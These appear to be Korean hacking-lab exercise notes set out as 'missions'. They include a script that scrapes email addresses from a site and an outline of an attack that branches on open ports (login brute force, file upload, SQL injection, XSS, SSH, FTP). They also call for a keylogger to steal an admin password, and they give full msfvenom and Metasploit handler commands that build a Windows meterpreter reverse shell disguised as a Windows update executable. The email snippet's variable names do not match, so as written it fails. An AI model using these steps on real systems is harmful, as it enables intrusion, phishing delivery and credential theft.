악성코드를 만들고 관리자 pc로 침투 시켜라
해커는 web2.st.kr에 저장된 이메일을 수집후 자동으로 담당자에게 메일 전송
패킷과 로그를 분석하여 악성코드 침투흔적을 찾아라
#이메일 주소 패턴
email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
email = re.findall(email_pattern, soup.text)
#중복제거 및 출력
unique_email = set(emails)
for email in unique_emails:
print(email)
미션2
스캔후에 열려있는 포트별로 자동으로 공격하는 공격코드 만들기
1.스캔을 한다
2.포트를 찾는다
3.80이면 http 공격을 한다
로그인 공격
파일 업로드 공격
SQL 인젝션 공격
XSS 공격
4.22이면 ssh공격을 한다
5.21이면 ftp공격을 한다
해커가 만든 profile.php를 업로드 하라
미션3
악성코드 침투발생
이메일
해커 다음 행동은
키로거 또는 화면캡처를 통해 관리자의 비밀번호를 찾아내라
악성코드 만들기
수집된 이메일로 자동으로 악성코드 보내기?
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.56.101
LPORT=4444
-b "\x00"
-f exe
-o /home/kali/windows_update_20250120001.exe
systemctl start apache2
nano malware.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 4444
exploit
msfconsole -r /home/kali/malware.rc
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -b "\x00" -f exe -o /home/kali/windows_update_20250120001.exe